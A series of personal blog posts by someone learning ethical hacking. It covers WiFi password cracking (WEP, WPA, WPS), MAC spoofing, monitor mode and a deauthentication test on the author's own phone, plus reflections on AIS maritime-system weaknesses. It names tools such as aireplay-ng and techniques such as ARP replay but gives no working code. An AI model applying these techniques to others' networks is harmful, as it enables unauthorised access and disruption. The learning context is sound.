The studies continue!  This has been a busy week, so I only got to cover the theory and practice behind cracking WiFi passwords – WEP, WPA, and WPA2.

WEP cracking is fairly straightforward.  Since each transmission contains the key that ultimately has to be cracked, it’s just a matter of gathering enough packets to analyse. Both gathering the packets and cracking they key is done with packages pre-installed in Kali.  The cool thing was speeding up the gathering of packets with ARP replay – forcing more authentication packets without the device owners necessarily noticing.

WPA cracking of course is far more complex. The course covers the exploitation of the WPS feature, a far simpler backdoor into a WPA network, but even around here WPS seems to be disabled by default or push-button-only.

For actual WPA cracking, I suppose it’s a testament to its level of security that the recommended attack is still a brute force dictionary attack. It was interesting to see what sort of ready libraries are available for download for testing – compilations of the top 10,000 passwords, actual dictionaries for different languages, and so on.

From my previous life in the corporate world, I have heard most of the horror stories of password policies. This class is the reason why we keep hearing the same ones – “why is the password to the server with our expensive custom software ‘password1’?” A justification for borderline paranoia regarding information security in the modern world is the “password on a post-it note on the monitor” and social engineering.  You might have strong passwords and encryption, but those you communicate with may not. So you want to collect data? Carry a clipboard and go anywhere.

I enjoyed the discussions of cryptography and password policies in Neal Stephenson’s Cryptonomicon. And still, at times I feel like D. M. Shaftoe’s character, too paranoid to use cryptography as all, since if something is worth keeping secret, it shouldn’t be shared digitally at all.

My secrets are safe, though. Notebooks, illegible handwriting, and fluency in obscure languages.

Midnight sun in a land of obscure languages

My Atheros AR9271 USB device arrived!  Now I’m back into my courses as originally planned.  I now keep my course in one workspace and a Kali VM in another.  I have used Kali before, but never under guidance – just fiddling around with a Live USB.

Step 1 today was changing the MAC address of my wi-fi adapter.  Reminds me of the first time I lived in shared housing, back at Oxford University.  To get ethernet access for my new PC after the old one packed it in, I had to submit my new computer’s ethernet MAC address for approval by the sysadmin.  I couldn’t be bothered, so I changed the MAC address to match the old one instead.

Step 2 was setting up monitor mode on my wi-fi adapter.  Even without manipulating any of the outputs of airodump-ng wlan0, the potential power here is obvious.  I’m not in a high-tech location. Everyone’s routers are broadcasting freely, and everyone has at least a smartphone turned on and typically connected to publicly visible wi-fi.  Since Viber is more popular than actual phone minutes or SMS, and virtually nobody takes steps towards anonymising themselves, there are privacy implications right off the bat – and I reckon almost nobody here is aware of it.  The data itself is encrypted, of course, but the fact of the data traffic being visible at all is noteworthy – and pretty cool.

Step 3 was my first ever deauthentication signal with aireplay-ng –deauth.  Or, in other words: with $23 of hardware incl. shipping, I booted my phone off my wi-fi, without touching it, and could keep it offline as long as I wanted, after 15 minutes of video lectures.  Only ethics stops me from keeping my neighbours off the internet. This made it sink in just how easy it actually would be to cause general havoc with vulnerability hacking.

I wonder why societies or the media in general don’t seem to take security vulnerabilities very seriously?  Many moons ago when I lived in –redacted–, there were rumours and mutterings followed by a full-blown scandal when it was discovered that the NSA’s Echelon program had a partner station there.  In fairly short order, cries about national sovereignty and privacy violations were silenced with statements like “the data is all encrypted anyway”. Even if encryption in general use by the general public at the time was effective and reliable (spoiler: nope), data flow itself is useful information – such as if your spouse’s phone regularly connects to the router of the attractive neighbour.

That is what struck me most about Edward Snowden’s revelations – enormous outcries for a short period, followed by… essentially nothing.  Despite the revelations that some of our online service providers, probably even chipset and OS manufacturers, are cooperating with foreign intelligence agencies to be able to manipulate or even access our personal data, most people don’t seem to take the slightest measures to protect their own data.

I look forward to learning a lot more about protecting data systems beyond the obvious steps I take already.  Although I now also have to fight the impulse to boot the harbourmaster off his wi-fi.

A bleak winter’s day in –redacted–

Happy New Year! The local sailing club held a New Year’s Eve Regatta in the bay, a dozen vessels of very different sizes and types playing around. I couldn’t participate due to a broken cotter pin on the mast and the lack of a proper reefing system, but I did spend the evening afloat. Looking at the array of vessels from dinghies to superyachts in the bay or moored nearby, I got to thinking of maritime security.

Technology has vastly changed the maritime world. While an 18th-century ship of the line could have in excess of 1,000 souls aboard, and a 19th-century merchant ship could have a crew of hundreds, a modern cargo ship may not even have a dozen people aboard. In the 21st century, IT is everywhere. It is hardly a surprise that every yacht or commercial vessel today will have a GPS, even if only as a mobile device – but the IT aboard is more connected than you may expect.

The International Maritime Organisation’s SOLAS (Safety of Life at Sea) treaty mandates that all vessels of 300 tonnes or more (and all passenger ships regardless of size) must be fitted with AIS – the Automatic Identification System. Anyone with an AIS receiver may then see data of vessels equipped with AIS transponders – ID number and vessel name, position, status (e.g. anchored or under way), speed, and even destination and ETA. You can even see this data now at https://www.marinetraffic.com. I use it myself on occasion to identify superyachts (which, given my location, I affectionately refer to as “mafia tubs”) pulling into the neighbouring luxury marina.

One would think that this system would be designed with security in mind? Well, quite the opposite, according to Trend Micro.  AIS data can be hacked and altered. In theory one could stop marine traffic in busy channels or harbours by exaggerating the size of one’s own vessel – imagine your transponder claiming your vessel was one square kilometer in size, when the transponder could be aboard a rowboat. One could also spoof signals, for example broadcasting warnings about drifting mines, or faking a maritime distress.

The consequences are serious. In the best case, a fake signal would just be an annoyance on a clear day, and backup and visual navigation plus radio communications would move everyone along – although with a number of blaring alarms that could cause chaos either from distraction or by leading to crew ignoring real signals lost in the noise. In the worst case, malicious actors could shut down vessel movement in an area completely, which in the case of poor weather and low visibility, could lead to severe accidents – or the publicly-available data could enable piracy. Combine it with a hack of a corporate database to identify the most lucrative targets, and a modern-day Bart Roberts could make a fortune without exceptional skills.

It gets better! AIS is rarely an isolated system. In modern vessels larger than a pleasure craft, AIS is likely to be integrated with the other navigational systems, such as GPS, ECDIS (Electronic Chart Display), and by extension potentially the entire control system of a vessel. One alleged hack in 2017 of a vessel travelling to Djibouti led to the captain being unable to maneuver at all for 10 hours, with the intention being to direct the vessel into waters where pirates could board and seize the vessel.

Modern commercial shipping relies so much on integrated computer systems that losing access to those systems, or receiving deliberately deceptive data from those systems, can raise absolute havoc. Cargo ships are not exceptionally maneuverable at the best of times – witness the recent Norwegian frigate collision, with a frigate sunk and a ship damaged even with all their computer systems working, due primarily to human factors and low visibility.

I recommend the Trend Micro report for further reading, as well as this.

I do not see a clear solution, nor a legal alternative for commercial vessels, beyond pressing ship owners to harden their security as much as they are able. As for myself – I’m well below the tonnage to require AIS and have no need of it, and can use a radar reflector on the mast to be more visible to ships less able to maneuver easily. I have a VHF radio and paper charts and am fully capable of navigating safely enough day or night by dead reckoning, charts, binnacle compass, and even celestial navigation and sextant if I were to head offshore. Low visibility? Down anchor, break out the rum.

Simpler rules for simpler vessels from a simpler time

Today I got started with the basics of wireless network hacking.  The instructor went through the basics of what networking is and how it functions.  Obviously the key is that in any network, the assets (like individual laptops, mobiles, tablets) do not connect to the end resource (a server, or the internet) directly, but all go through a router or similar.  With wireless networking, that provides ample possibilities for pre-connection attacks, attacks by gaining access, and post-connection attacks.

I ran into a small hardware roadblock at this point.  Since I’m now doing things “properly” with a Kali VM for learning and practise, my VM can’t properly access my wireless card.  Therefore I need a USB wireless adapter so the VM can access the wireless hardware through the USB. The instructor recommends the Atheros AR9271 chipset, and sells them alongside the course… since I live in a tiny agriculture-based non-EU nation that doesn’t even exist in many online stores’ dropdown menus, my options for buying a suitable device were limited.  So the instructor made another $23 off me with his online store. Well, merry Christmas to me.

While I’m waiting on shipping, I get to think about connectivity through the ages.  I grew up in Africa, and my first experience with the internet was borrowing my dad’s connection at work to find out in real-time how Garry Kasparov’s chess match against Deep Blue was going.  Yep, I was that kind of teenager. In later years in Africa I would get my own connections at home, with the 28.8 modem running across the phone line, which meant the connection would drop if anyone picked up the phone.  Later there was a habit of phone lines getting crossed, which meant that when I was trying to get online I could hear diplomats’ phone conversations through my modem – quite a security problem in itself, especially as I spoke their language as well.

Now, of course, wi-fi is ubiquitous, and most people don’t give a second thought to their network access at the local bar or coffee shop.  I was in Cuba some time ago, and there, internet access is controlled by the state (with domestic LAN-based alternatives replicating a surprising amount of internet functionality on the island for free).  Every hotel would have its outside walls lined with Cubans accessing the outside world on their Android devices. How security-conscious are they, I wonder? As for myself, I thought it safer to stick to the rum and cigars, offline.

I look forward to learning more about the intricacies of networks.  Networks aren’t my strong point. Fortunately, they are my girlfriend’s strong point, so she advises me whenever I’m stuck.

Old and new in Havana

I am venturing into the as-now uncharted waters of ethical hacking…

For context: I have been using computers daily since the age of 4, where I would sneak in my brother’s room to borrow his Commodore 128 (who remembers 5 1/4 inch flippy disks?).  Growing up in Africa I got addicted to flight simulators and would reprogram my joysticks. Internet access arrived in 1996 where I lived, on a 28.8 modem on an “iffy” phone line. My formal studies were in history, but my work ultimately took me to overseeing bespoke simulator software and antivirus tech support. Even so, I stuck with operations and administration – until I got a Google scholarship for Android development, which brought me into Java programming. It turns out that was addictive.

Thus, by the time I joined Security Roots to join the Dradis Support team, I had a fair bit of IT operations experience, an awareness of best security practices, and a budding interest in programming and development. My skills are being tested daily, and growing as a result. So now I want to get deeper into the InfoSec and security testing worlds!

I have signed up to a number of online security courses about Ethical Hacking and purchased a virtual pile of books for my e-book reader for long nights aboard my sailing yacht. I will start with a general course covering most aspects of Ethical Hacking going into practical exercises for each realm. Next, I have a particular interest in learning about Android security and wireless hacking. To start my journey I have set up a fresh Kali virtual machine, and my first semi-formal training in network hacking begins tomorrow. I feel at home with Linux (even being no stranger to Kali and Tails, which I explored earlier out of curiosity), less so with networks. Let’s go!